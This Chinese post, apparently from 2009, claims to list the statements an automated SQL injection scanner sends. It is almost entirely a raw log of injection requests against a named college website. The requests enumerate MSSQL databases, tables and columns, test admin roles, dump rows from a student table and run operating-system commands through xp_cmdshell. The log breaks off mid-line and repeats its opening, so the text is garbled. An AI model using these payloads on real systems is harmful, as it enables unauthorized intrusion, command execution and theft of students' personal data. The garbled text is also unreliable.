SQL注入自动扫描工具中的语句
2009-10-08 10:38
453 查看
SQL注入自动扫描工具中的语句
包括猜解数据库库名、表名、字段名、字段内容(表内容)、表条数,以及测试相关的权限。
(mssql/mysql)
==================================
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user=0--
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user=0--
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20db_name()%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20db_name()%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20@@version%3E1--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20@@servername%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20cast(is_member(0x640062005f006f0077006e0065007200)%20as%20nvarchar(1))%2bchar
(124)=1%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20cast(is_srvrolemember(0x73006500740075007000610064006d0069006e00)%20as%
20nvarchar(1))%2bchar(124)=1%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20cast(is_srvrolemember(0x73006500630075007200690074007900610064006d0069006e00)%
20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20cast(is_srvrolemember(0x620075006c006b00610064006d0069006e00)%20as%20nvarchar
(1))%2bchar(124)=1%20and%201=1
GET %20as%20nvarchar(4000))%2bchar(94)%20from]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from
(select%20top%20%201%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
GET %20as%20nvarchar(4000))%2bchar(94)%20from]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from
(select%20top%20%202%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
GET %20as%20nvarchar(4000))%2bchar(94)%20from]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from
(select%20top%20%203%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;insert%20foofoofoo%20exec%20master.dbo.xp_availablemedia;--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;create%20table%20foofoofoo(name%20nvarchar(255),description%20nvarchar(4000));--%
20and%201=1
GET %20as%20nvarchar(4000))%2bchar(94)%2bcast]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast
([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%
201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[main]..
[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%201%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%202%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%203%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%204%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%205%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%206%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%207%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%208%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%209%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%2010%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(id%20as%20nvarchar(20))%2bchar(124)%20from%20[main]..
[sysobjects]%20where%20name=0x730074007500640065006e007400)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[main]..
[syscolumns]%20where%20id=869578136)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
202%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
203%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
204%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
205%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
206%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
207%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
208%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
209%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
2010%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
2011%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20[main]..
[student]%20where%201=1)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%201%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%202%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%203%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%204%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%205%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%206%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%207%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%208%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%209%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2010%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2011%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2012%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2013%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2014%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2015%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2016%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2017%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2018%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2019%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;create%20table%20foofoofoo%20(a%20image);--%20and%201=1
GET %20[int]%20identity%20]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;declare%20@s%20varchar(4000)%20set%20@s=cast
(0x64726f70207461626c6520666f6f666f6f666f6f3b435245415445205441424c45205b666f6f666f6f666f6f5d285b526573756c745478745d206e76617263686172283430303029204e554c4c
293b62756c6b20696e73657274205b666f6f666f6f666f6f5d2066726f6d2027633a5c273b416c746572205461626c65205b666f6f666f6f666f6f5d2061646420696420696e74204e4f54204e554
c4c204944454e544954592028312c31293b%20as%20varchar(4000));exec(@s)--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;insert%20foofoofoo%20exec%20master.dbo.xp_availablemedia;--%20and%201=1
GET %20as%20nvarchar(4000))%2bchar(94)%2bcast]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast
([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%201=1
GET %20[int]%20identity%20]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
3E0--%20and%201=1
GET %20[int]%20identity%20]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
3E0--%20and%201=1
GET %20[int]%20identity%20]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
3E0--%20and%201=1
GET ([resulttxt]%20nvarchar(4000)%20null);--%20and%201=1]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;create%20table%20[foofoofoo]([resulttxt]%20nvarchar(4000)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;exec%20master.dbo.sp_addextendedproc%
200x730070005f004f004100430072006500610074006500,%200x780070006c006f006700370030002e0064006c006c00--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;declare%20@z%20nvarchar(4000)%20set%20@z=0x640069007200200063003a005c00%20insert%
20into%20[foofoofoo](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[foofoofoo]%20add%20id%20int%20not%20null%20identity%20(1,1)--%20and%
201=1
GET http://xgzx.w
包括猜解数据库库名、表名、字段名、字段内容(表内容)、表条数,以及测试相关的权限。
(mssql/mysql)
==================================
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user=0--
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user=0--
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20db_name()%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20db_name()%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20@@version%3E1--%20and%201=1
